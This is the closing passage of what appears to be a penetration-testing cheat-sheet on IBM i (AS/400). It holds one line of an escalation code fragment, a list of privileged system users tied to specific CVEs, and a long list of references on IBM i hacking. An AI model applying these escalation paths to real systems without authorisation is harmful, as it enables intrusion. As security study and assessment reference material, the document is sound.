    624     sPGMCall.setProcedureName("QlwiRelayCall");
    625     ```
    626 
    627 * QSECOFR user - CVE-2023-40685
    628 * QDIRSRV user - CVE-2023-40378
    629 * QYPSJSVR user - CVE-2023-40686
    630 * QBRMS user - CVE-2023-40377
    631 
    632 ## References
    633 
    634 * [Abusing Adopted Authority on IBM i - Zoltán Pánczél - January 20, 2023](https://blog.silentsignal.eu/2023/01/20/abusing-adopted-authority-on-ibm-i/)
    635 * [Adopted Authority - IBM Support - October 3, 2024](https://www.ibm.com/support/pages/adopted-authority)
    636 * [An IBM i Hacking Tale - Pablo Zurro - April 6, 2023](https://www.fortra.com/blog/ibm-i-hacking-tale)
    637 * [Another Tale of IBM i (AS/400) Hacking - Zoltán Pánczél - September 28, 2022](https://blog.silentsignal.eu/2022/09/28/another-tale-of-ibm-i-as-400-hacking/)
    638 * [AS/400 for pentesters - Black Hat Europe 2006 - Shalom Carmel](https://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Carmel/bh-eu-06-Carmel.pdf)
    639 * [Awesome-Mainframe-Hacking - samanL33T - July 10, 2019](https://github.com/samanL33T/Awesome-Mainframe-Hacking)
    640 * [Below MI - IBM i for Hackers - Silent Signal - August 22, 2024](https://silentsignal.github.io/BelowMI/)
    641 * [Common Misconcepts on IBM i User Class - *SECOFR - Dan Riehl - September 12, 2013](https://www.securemyi.com/nl/articles/userclass.html)
    642 * [FrenchIBMi - Christian Massé - March 15, 2017](https://github.com/FrenchIBMi/Clubs/)
    643 * [Geeking Out On IBM i - Part 1 - Anonymous - August 31, 2021](https://web.archive.org/web/20210831231128/https://blog.grimm-co.com/2021/07/geeking-out-on-ibm-i-part-1.html)
    644 * [Guru: IBM i *USRPRF Security - Bruce Bading - May 23, 2022](https://www.itjungle.com/2022/05/23/guru-ibm-i-usrprf-security/)
    645 * [Hack the Legacy: IBM I aka AS400 Revealed - Bart Kulach - December 25, 2015](https://youtu.be/JsqUZ3xGdLc)
    646 * [Hack the legacy! IBM i (aka AS/400) revealed - Bart Kulach - May 11, 2021](https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/DEF%20CON%2023%20-%20Bart-Kulach-Hack-the-Legacy-IBMi-revealed.pdf)
    647 * [Hacking IBM AS/400 in 2024: QShell and Remote Code Execution - Mateusz Lewczak - October 04, 2024](https://www.securitum.com/hacking_ibm_as400_in_2024.html)
    648 * [How to get & crack AS/400 hashes? - Fossies - November 7, 2017](https://fossies.org/linux/john/doc/README.IBM_AS400)
    649 * [IBM AS/400 - Configuration TCP/IP - Podalirius - August 5, 2021](https://podalirius.net/en/mainframe/ibm-as-400-tcp-ip-configuration/)
    650 * [IBM I FOR WINTEL HACKERS - TROOPERS 2024 - ZOLTÁN PÁNCZÉL, BÁLINT VARGA-PERKE - June 26th, 2024](https://silentsignal.hu/docs/S2-TROOPERS24-IBM_i_for_Wintel_Hackers.pdf)
    651 * [IBM i Privileged Users – A Unique Security Challenge - Patrick Townsend - June 27, 2017](https://info.townsendsecurity.com/ibm-i-privileged-users-a-unique-security-challenge)
    652 * [IBM i Security Demystified Blog, Episode 1 - Matthew Carpenter - June 23, 2020](https://web.archive.org/web/20200704060220/https://blog.grimm-co.com/2020/06/ibm-i-security-demystified-blog-episode.html)
    653 * [IPL types and modes for IBM AS/400 - Podalirius - June 16, 2021](https://podalirius.net/en/mainframe/ipl-modes-for-ibm-as400/)
    654 * [Is Your IBM i (iSeries/AS400) Security Vulnerable To Privilege Escalation And Lack Of Proper Access Controls? - Bob Losey - June 6, 2022](https://www.linkedin.com/pulse/your-ibm-i-iseriesas400-security-vulnerable-privilege-bob-losey/)
    655 * [Pentest AS/400 - COGICEO](https://www.ossir.org/jssi/jssi2016/Pentest_AS400_COGICEO.pdf)
    656 * [Re: [PEN-TEST] Pen-Testing AS/400 - Al Sparks - December 12, 2000](https://seclists.org/pen-test/2000/Dec/205)
    657 * [Restoring an IBM AS/400 (9401-150) - Podalirius - June 10, 2021](https://podalirius.net/en/mainframe/restoring-an-ibm-as400-9401-150/)
    658 * [Security Assessment of the IBM i (AS 400) System – Part 1 - Shashank Gosavi - August 14, 2020](https://web.archive.org/web/20200921183809/https://iisecurity.in/blog/security-assessment-ibm-400-system-part-1/)
    659 * [Security Audit of IBM AS/400 and System i : Part 1 - Yogesh Prasad - August 21, 2018](https://web.archive.org/web/20200927010533/https://blog.securitybrigade.com/security-audit-of-ibm-as-400-system-i-part-1/)
    660 * [Security Audit of IBM AS/400 and System i : Part 2 - Yogesh Prasad - August 22, 2018](https://web.archive.org/web/20200927002911/https://blog.securitybrigade.com/security-audit-ibm-as-400-system-i-2/)
    661 * [Simple IBM i (AS/400) hacking - Zoltán Pánczél - September 5, 2022](https://blog.silentsignal.eu/2022/09/05/simple-ibm-i-as-400-hacking/)
    662 * [Special authority - IBM - April 11, 2023](https://www.ibm.com/docs/en/i/7.4?topic=fields-special-authority)
    663 * [Stealing User Profiles! Exploiting Unsecured User Profiles on IBM i. - Dan Riehl - December 28, 2017](https://www.securemyi.com/nl/articles/hijack.html)
    664 * [TCP/IP Ports Required for IBM i Access and Related Functions - IBM - December 4, 2023](https://www.ibm.com/support/pages/tcpip-ports-required-ibm-i-access-and-related-functions)
    665 * [TROOPERS24: IBM i for Wintel Hackers - Bálint Varga-Perke, Zoltán Pánczél - Septemeber 2, 2024](https://www.youtube.com/watch?v=t4fUvfzgUbY)
    666 * [Vulnerability Archeology: Stealing Passwords with IBM i Access Client Solutions - Silent Signal - January 21, 2025](https://blog.silentsignal.eu/2025/01/21/ibm-acs-password-dump/)
    667 * [Why Building an OS/400 Lab at Home Was Harder Than I Expected - Podalirius - January 24, 2020](https://podalirius.net/en/mainframe/why-building-an-os-400-lab-at-home-was-harder-than-i-expected/)